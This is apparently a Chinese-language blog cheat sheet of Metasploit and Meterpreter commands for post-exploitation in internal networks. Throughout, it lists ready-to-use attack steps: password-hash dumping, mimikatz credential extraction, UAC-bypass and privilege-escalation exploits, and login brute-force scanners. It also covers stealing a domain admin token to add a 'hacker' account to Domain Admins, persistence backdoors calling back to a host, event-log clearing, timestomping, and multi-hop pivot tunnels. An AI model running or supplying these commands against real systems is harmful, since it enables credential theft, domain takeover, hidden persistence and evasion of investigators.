meterpreter在内网中的作用就跟web中的sqlmap和burpsuite的价值是一样的。本文只涉及内网,持续更新

0x01 枚举linux可用信息 | windows

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
run post/linux/gather/hashdump              #hash密码
run post/linux/gather/checkvm               #是否虚拟机
run post/linux/gather/enum_configs          #枚举配置信息
run post/linux/gather/enum_network          #枚举网络配置
run post/linux/gather/enum_protections      #发现像IDS,防病毒,防火墙等
run post/linux/gather/enum_system           #获取有关用户帐户/软件/服务/Linux版本
run post/linux/gather/enum_users_history    #枚举历史信息
run post/windows/gather/arp_scanner         #检测到sessions -i number的IP地址
run post/windows/escalate/getsystem         #getsystem
run post/windows/gather/credentials/gpp     #寻找储存在SYSVOL中的Groups.xml
post/windows/gather/enum_unattend           #全盘搜索Unattend.xml文件查找账户密码
exploit/windows/local/always_install_elevated       #创建一个随机文件名的MSI文件并在提权成功后删除所有已部署的文件

run vnc
run scraper                                 #常见信息收集[好用,没有之一]

0x02 Bypass-modules

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
exploit/windows/local/bypassuac_vbs         #会生成新的session[getsystem]
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac
exploit/windows/local/ask
exploit/windows/local/ms13_053_schlamperei
exploit/windows/local/ms14_058_track_popup_menu
exploit/windows/local/ms16_016_webdav       #Windows 7 SP1
exploit/windows/local/ms16_032_secondary_logon_handle_privesc
exploit/windows/local/trusted_service_path
exploit/windows/local/service_permissions

0x03 service-attack-modules

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/telnet/telnet_login
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mysql/mysql_login
use auxiliary/scanner/oracle/oracle_login
use auxiliary/scanner/postgres/postgres_login
use auxiliary/scanner/vnc/vnc_login
use auxiliary/scanner/pcanywhere/pcanywhere_login
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/ftp/anonymous

0x04 meterpreter常用命令

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
pwd |edit |upload |download |getuid |getsystem |sysinfo     #基本命令
python
    python_import <-f file path> [-n mod name] [-r result var name]
    python_execute <python code> [-r result var name]
    python_reset

powershell
    powershell_execute  <powershell code> [-s session-id]
    powershell_import   <path to file> [-s session-id]      #执行本地ps1或者dll
    powershell_shell                                        #会话终端

kiwi
    kiwi_cmd "privilege::debug sekurlsa::logonPasswords"

mimikatz
    wdigest
    mimikatz_command  -f sekurlsa::logonPasswords -a "full"
    mimikatz_command  -f sekurlsa::kerberos -a "full"

sniffer
    sniffer_interfaces
    sniffer_start [网卡id]
    sniffer_stats [网卡id]
    sniffer_dump [绝对路径]

令牌劫持[whoami /groups]
    ps          #查看目标机器进程,找出域控账户运行的进程ID,假如发现PID为 6666
    steal_token 6666 [pid]                  #偷取Token
    use incognito                           #当ps找不到域控账户进程时
    list_tokens –u                          #列出可用token,假如找到域控管理员token
    impersonate_token 2008.com\\dcadministrator     #使用域管理员token运行meterpreter
    add_user hacker password –h 192.168.1.2         #在域控主机上添加账户,ip指向域控
    add_group_user "DomainAdmins" test –h 192.168.1.2    #将账户添加至域管理员组

migrate  pid                                #将Meterpreter会话移植到进程数位pid的进程中  [不稳定,explorer.exe]

execute -H -i -f cmd.exe                    #创建新进程cmd.exe,-H不可见,-i交互

timestompc:/a.txt -c "11/11/2011 11:11:11"  #修改文件的创建时间

arp_scanner -r 192.168.1.0/24

run persistence -X -i 5 -p 2222 -r x.x.x.x  #开机启动项vbs后门 X86_Linux不支持此脚本

run metsvc -A                               #Meterpreter服务后门[windows/metsvc_bind_tcp]

clearev                                     #清理痕迹

run autoroute -s 192.168.1.0/24             #配合run post/windows/gather/

0x05 一级隧道

1
2
3
4
5
6
7
8
(依赖:建立meterpreter正常通信 [re:192.168.1.2])
portfwd add -l 1234 -p 3389 -r x.x.x.x      #反弹端口3389到本地1234[rdesktop 127.0.0.1:1234]
ssh -f -N -D 127.0.0.1:2222 root@10.1.1.3   #ssh端口转发
route add 10.1.1.0 255.255.255.255 1        #添加session 1的路由表[route print]
use auxiliary/server/socks4a                #建立隧道
    vim /etc/proxychains.conf
    socks4  127.0.0.1 1080
proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse 10.1.1.2

0x06 二级隧道

1
2
3
4
5
6
7
8
9
route add 10.1.1.2 255.255.255.255 2        #添加一级隧道路由表
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp    #正向通道
set RHOST 10.1.1.1
set RPORT 2222
use auxiliary/server/socks4a                #建立隧道
    vim /etc/proxychains.conf
    socks4  127.0.0.1 1081
proxychains nmap -sT -sV -p21,22,23,80 -n -Pn -vv 172.16.6.3

0x07 三级隧道

1
2
3
4
5
route add 172.16.6.3 255.255.255.255 3      #添加二级隧道路由表
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp    #正向通道
set RHOST 172.16.6.3
set RPORT 3333

0x08 彩蛋

https://www.youtube.com/watch?v=awLMbwj5iP0

https://www.youtube.com/watch?v=wK0r-TZR7w8

相关链接

Windows-Exploit-Suggester

exploit-db

securityfocus

hackingarticles

https://www.youtube.com/watch?v=jCoL7oXvT_E

https://www.youtube.com/watch?v=DlJyKgfkoKQ